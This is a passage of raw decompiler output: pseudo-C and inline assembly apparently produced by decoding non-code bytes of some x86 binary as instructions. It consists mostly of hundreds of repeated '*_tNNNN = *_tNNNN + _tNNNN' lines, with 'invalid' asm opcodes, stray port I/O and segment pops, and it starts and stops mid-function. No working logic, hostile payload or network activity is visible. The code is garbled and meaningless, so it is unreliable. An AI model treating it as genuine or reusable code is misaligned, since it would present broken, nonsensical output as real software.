        					 *_t1181 =  *_t1181 + 1;
        					 *_t1181 =  *_t1181 + _t1181;
        					_v535035840 = _v535035840 + _t1667;
        					_t1182 = _t1181 + 1;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *((intOrPtr*)(_t1182 - 0x4e)) =  *((intOrPtr*)(_t1182 - 0x4e)) + _t1659;
        					 *_t1182 =  *_t1182 - _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					asm("clc");
        					asm("sbb eax, [eax]");
        					 *_t1182 =  *_t1182 + _t1182;
        					 *_t1182 =  *_t1182 + _t1182;
        					_t1183 = _t1182 + 1;
        					 *_t1183 =  *_t1183 + _t1183;
        					 *_t1183 =  *_t1183 + _t1183;
        					_t1184 = _t1183 + _t1659;
        					asm("sbb eax, [eax]");
        					 *_t1184 =  *_t1184 + _t1184;
        					 *_t1184 =  *_t1184 + _t1184;
        					 *((intOrPtr*)(_t1184 + _t1184 * 2)) =  *((intOrPtr*)(_t1184 + _t1184 * 2)) + _t1659;
        					 *_t1184 =  *_t1184 + _t1184;
        					 *_t1184 =  *_t1184 + _t1184;
        					asm("sbb eax, [eax]");
        					_t1186 = _t1184 + _t1659 +  *((intOrPtr*)(_t1184 + _t1659));
        					 *_t1186 =  *_t1186 + _t1186;
        					 *((intOrPtr*)(_t1186 + _t1186 * 2)) =  *((intOrPtr*)(_t1186 + _t1186 * 2)) + _t1659;
        					 *_t1186 =  *_t1186 + _t1186;
        					 *((intOrPtr*)(_t1777 + 0x6c006801)) =  *((intOrPtr*)(_t1777 + 0x6c006801)) + _t1773;
        					 *((intOrPtr*)(_t1186 + 0x1c)) =  *((intOrPtr*)(_t1186 + 0x1c)) + _t1773;
        					 *((intOrPtr*)(_t1659 + _t1801 * 8)) =  *((intOrPtr*)(_t1659 + _t1801 * 8)) + _t1667;
        					_t1188 = _t1186 + 2;
        					 *_t1188 =  *_t1188 + _t1188;
        					 *_t1188 =  *_t1188 + _t1188;
        					 *((intOrPtr*)(_t1188 - 0x6bffd603)) =  *((intOrPtr*)(_t1188 - 0x6bffd603)) + _t1659;
        					asm("das");
        					_t1189 = _t1188 + 1;
        					 *((intOrPtr*)(_t1777 +  &_a4194368)) =  *((intOrPtr*)(_t1777 +  &_a4194368)) + _t1189;
        					 *((intOrPtr*)(_t1777 +  &_a65600)) =  *((intOrPtr*)(_t1777 +  &_a65600)) + _t1773;
        					_t1191 = (_t1189 | 0x00003400) +  *(_t1189 | 0x00003400);
        					 *_t1191 =  *_t1191 + _t1191;
        					 *_t1191 =  *_t1191 + _t1191;
        					 *_t1191 =  *_t1191 + _t1191;
        					 *_t1191 =  *_t1191 + _t1191;
        					asm("sbb al, 0x40");
        					 *((intOrPtr*)(_t1773 + _t1773)) =  *((intOrPtr*)(_t1773 + _t1773)) + _t1659;
        					asm("les ebp, [edi]");
        					_t1193 = _t1191 -  *_t1191 + 1;
        					 *_t1667 =  *_t1667 + _t1193;
        					 *_t1659 =  *_t1659 + _t1193;
        					 *_t1193 =  *_t1193 + _t1193;
        					ds = _t1191;
        					 *_t1193 =  *_t1193 + _t1659;
        					 *_t1193 =  *_t1193 + _t1193;
        					_t1195 = _t1193 + _t1667 -  *((intOrPtr*)(_t1193 + _t1667));
        					asm("invalid");
        					asm("invalid");
        					 *_t1195 =  *_t1195 + _t1195;
        					 *_t1195 =  *_t1195 + _t1195;
        					 *_t1195 =  *_t1195 + _t1195;
        					 *_t1195 =  *_t1195 + _t1195;
        					asm("pushfd");
        					asm("sbb al, 0x40");
        					 *((intOrPtr*)(_t1195 + 0x52)) =  *((intOrPtr*)(_t1195 + 0x52)) + _t1773;
        					_t1196 = _t1195 & 0x402afc00;
        					_t1660 = _t1659 + _t1659;
        					asm("invalid");
        					 *_t1196 =  *_t1196 + 1;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					asm("sbb al, 0x40");
        					 *((intOrPtr*)(_t1196 - 0x69ffbfe5)) =  *((intOrPtr*)(_t1196 - 0x69ffbfe5)) + _t1196;
        					asm("adc eax, [eax]");
        					asm("pushfd");
        					asm("adc eax, [eax]");
        					 *0x4013 = _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1667;
        					asm("sbb al, 0x40");
        					 *((intOrPtr*)(_t1196 - 0x69ffbfe5)) =  *((intOrPtr*)(_t1196 - 0x69ffbfe5)) + _t1196;
        					asm("adc eax, [eax]");
        					asm("pushfd");
        					asm("adc eax, [eax]");
        					 *0x4013 = _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					 *_t1196 =  *_t1196 + _t1196;
        					_t1197 = _t1196 + _t1773;
        					 *_t1197 =  *_t1197 + _t1197;
        					 *_t1197 =  *_t1197 + _t1667;
        					_t1198 = _t1197 & 0x00000040;
        					 *_t1198 =  *_t1198 + _t1198;
        					 *(_t1777 - 0x2cefffc0) =  *(_t1777 - 0x2cefffc0) << 0x40;
        					 *((intOrPtr*)(_t1198 + 0x19)) =  *((intOrPtr*)(_t1198 + 0x19)) + _t1773;
        					 *_t1198 =  *_t1198 + _t1198;
        					_t1200 = (_t1198 | _t1198) + 1;
        					 *((intOrPtr*)(_t1788 + 0x12)) =  *((intOrPtr*)(_t1788 + 0x12)) + _t1200;
        					_t1201 = _t1200 + 1;
        					 *_t1201 =  *_t1201 + _t1201;
        					asm("loopne 0x42");
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					 *_t1201 =  *_t1201 + _t1201;
        					_t1202 = _t1201 + _t1201;
        					asm("adc eax, 0x10040");
        					 *_t1202 =  *_t1202 + _t1202;
        					 *_t1202 =  *_t1202 + _t1202;
        					 *_t1202 =  *_t1202 + _t1202;
        					 *0x40 =  *0x40 | _t1202;
        					 *_t1202 =  *_t1202 + _t1202;
        					_v65472 = _v65472 ^ _t1202;
        					asm("invalid");
        					 *_t1202 =  *_t1202 + _t1202;
        					 *_t1202 =  *_t1202 + _t1202;
        					_pop(_t1810);
        					_t1204 = (_t1202 & 0xe0080040) + 1;
        					 *_t1204 =  *_t1204 + _t1204;
        					 *_t1204 =  *_t1204 + _t1204;
        					 *_t1204 =  *_t1204 + _t1667;
        					asm("cld");
        					_t1205 = _t1204 &  *_t1204;
        					 *_t1205 =  *_t1205 + _t1205;
        					 *_t1205 =  *_t1205 + _t1205;
        					 *_t1205 =  *_t1205 + _t1205;
        					 *_t1205 =  *_t1205 + _t1205;
        					 *_t1205 =  *_t1205 + _t1205;
        					 *_t1205 =  *_t1205 + _t1205;
        					asm("in al, 0x1f");
        					_t1206 = _t1205 + 1;
        					 *_t1667 =  *_t1667 + _t1206;
        					 *_t1206 =  *_t1206 + _t1206;
        					 *((intOrPtr*)(_t1206 + 0x402a)) =  *((intOrPtr*)(_t1206 + 0x402a)) + _t1660;
        					 *_t1206 =  *_t1206 + _t1206;
        					_pop(ds);
        					_t1208 = _t1206 + _t1206 + 1;
        					 *_t1667 =  *_t1667 + _t1208;
        					 *_t1208 =  *_t1208 + _t1208;
        					_pop(ds);
        					_t1210 = _t1208 + _t1667 + 1;
        					 *_t1210 =  *_t1210 + _t1210;
        					 *_t1210 =  *_t1210 + _t1210;
        					_pop(ds);
        					_t1212 = _t1210 + _t1667 + 1;
        					 *_t1212 =  *_t1212 + _t1667;
        					 *_t1212 =  *_t1212 + _t1212;
        					_pop(ds);
        					 *_t1667 =  *_t1667 + _t1667;
        					 *((intOrPtr*)(_t1777 + 0x6c006801)) =  *((intOrPtr*)(_t1777 + 0x6c006801)) + _t1773;
        					 *_t1667 =  *_t1667 + _t1667;
        					_t1215 = _t1212 + _t1667 + 2;
        					 *_t1215 =  *_t1215 + _t1773;
        					asm("repne inc eax");
        					 *_t1215 =  *_t1215 + _t1215;
        					 *_t1215 =  *_t1215 + _t1215;
        					_t1778 = _t1777 - 1;
        					_t1220 = (_t1215 + _t1215 & 0x402ac800) + _t1660 -  *((intOrPtr*)((_t1215 + _t1215 & 0x402ac800) + _t1660)) + 1;
        					 *_t1778 =  *_t1778 + _t1660;
        					 *((intOrPtr*)(_t1220 + _t1220)) =  *((intOrPtr*)(_t1220 + _t1220)) + _t1773;
        					 *_t1220 =  *_t1220 + _t1220;
        					asm("in al, dx");
        					_t1221 = _t1220 -  *_t1220;
        					asm("invalid");
        					asm("invalid");
        					 *_t1221 =  *_t1221 + _t1221;
        					 *_t1221 =  *_t1221 + _t1221;
        					 *_t1221 =  *_t1221 + _t1221;
        					 *_t1221 =  *_t1221 + _t1221;
        					_push(_t1221);
        					 *_t1221 =  *_t1221 & _t1221;
        					if( *_t1221 >= 0) {
        						_t1629 = _t1221 & 0x402afc00;
        						_t1660 = _t1660 + _t1660;
        						asm("invalid");
        						 *_t1629 =  *_t1629 + 1;
        						asm("adc eax, [eax]");
        						 *_t1629 =  *_t1629 + _t1629;
        						if( *_t1629 >= 0) {
        							_t1630 = _t1629 + 1;
        							 *_t1788 =  *_t1788 + _t1630;
        							 *_t1660 =  *_t1660 + _t1630;
        							 *_t1630 =  *_t1630 + _t1630;
        							 *_t1630 =  *_t1630 + _t1630;
        							 *_t1630 =  *_t1630 + _t1630;
        							 *_t1630 =  *_t1630 + _t1630;
        							_t1631 = _t1630 + _t1630;
        							 *_t1631 =  *_t1631 & _t1631;
        							asm("adc byte [edx+0x25], 0x0");
        							 *_t1660 = gs;
        							_t1632 = _t1631 + 1;
        							 *_t1788 =  *_t1788 + _t1632;
        							 *_t1660 =  *_t1660 + _t1632;
        							 *_t1632 =  *_t1632 + _t1632;
        							asm("adc eax, [eax]");
        							 *_t1632 =  *_t1632 + _t1632;
        							_t1629 = _t1810 -  *_t1810;
        							 *_t1629 =  *_t1629 + _t1629;
        						}
        						 *_t1660 =  *_t1660 + _t1629;
        						 *_t1629 =  *_t1629 + _t1629;
        						 *_t1629 =  *_t1629 + _t1629;
        						 *_t1629 =  *_t1629 + _t1629;
        						 *_t1629 =  *_t1629 + _t1629;
        						 *((intOrPtr*)(_t1629 + 0x22)) =  *((intOrPtr*)(_t1629 + 0x22)) + _t1667;
        						_t1221 = _t1629 + 1;
        						 *((intOrPtr*)(_t1221 - 0x5bffdaae)) =  *((intOrPtr*)(_t1221 - 0x5bffdaae)) + _t1773;
        					}
        					asm("movsb");
        					_t1222 = _t1221 -  *_t1221;
        					 *_t1222 =  *_t1222 + _t1222;
        					_t1224 = _t1222 +  *_t1222 + 1;
        					 *_t1667 =  *_t1667 + _t1773;
        					 *_t1224 =  *_t1224 + _t1224;
        					 *_t1224 =  *_t1224 + _t1224;
        					asm("lodsb");
        					_t1226 = _t1224 -  *_t1224 + 0x300;
        					 *_t1226 =  *_t1226 + _t1226;
        					 *_t1226 =  *_t1226 + _t1226;
        					 *_t1226 =  *_t1226 + _t1226;
        					 *((intOrPtr*)(_t1773 + 0x52a00040)) =  *((intOrPtr*)(_t1773 + 0x52a00040)) + _t1667;
        					_t1227 = _t1226 & 0x402bbc00;
        					 *0x40000300 =  *0x40000300 + _t1227;
        					 *_t1778 =  *_t1778 + _t1667;
        					 *((intOrPtr*)(_t1227 + _t1227)) =  *((intOrPtr*)(_t1227 + _t1227)) + _t1227;
        					_t1229 = _t1227 + _t1667 -  *((intOrPtr*)(_t1227 + _t1667));
        					_pop(es);
        					 *_t1660 =  *_t1660 + _t1229;
        					 *_t1229 =  *_t1229 + _t1229;
        					 *_t1229 =  *_t1229 + _t1229;
        					 *_t1229 =  *_t1229 + _t1229;
        					 *_t1229 =  *_t1229 + _t1229;
        					 *_t1229 =  *_t1229 + _t1667;
        					 *_t1778 =  *_t1778 + 0x52;
        					 *_t1660 =  *_t1660 + 0x52;
        					 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + 0x52;
        					asm("adc eax, 0x4800");
        					_t1236 = 0 -  *((intOrPtr*)(0)) +  *((intOrPtr*)(0 -  *((intOrPtr*)(0))));
        					 *_t1236 =  *_t1236 + 0x52;
        					 *_t1236 =  *_t1236 + 0x52;
        					 *_t1236 =  *_t1236 + 0x52;
        					 *_t1236 =  *_t1236 + 0x52;
        					_pop(_t1811);
        					asm("rcl byte [edx+0x25], 0x0");
        					asm("lock sub eax, [eax]");
        					_t1240 = (_t1236 &  *_t1236) +  *(_t1236 &  *_t1236) + 1;
        					 *_t1660 =  *_t1660 + _t1773;
        					 *((intOrPtr*)(_t1240 + _t1240)) =  *((intOrPtr*)(_t1240 + _t1240)) + _t1667;
        					 *((intOrPtr*)(_t1660 +  &_a131136)) =  *((intOrPtr*)(_t1660 +  &_a131136)) + _t1773;
        					_t1241 = _t1240 +  *_t1240;
        					 *_t1241 =  *_t1241 + 0x52;
        					 *_t1241 =  *_t1241 + 0x52;
        					 *_t1241 =  *_t1241 + 0x52;
        					 *_t1241 =  *_t1241 + 0x52;
        					asm("enter 0x4023, 0x0");
        					_t1242 = _t1241 & 0x402bf800;
        					 *_t1773 =  *_t1773 + 0x52;
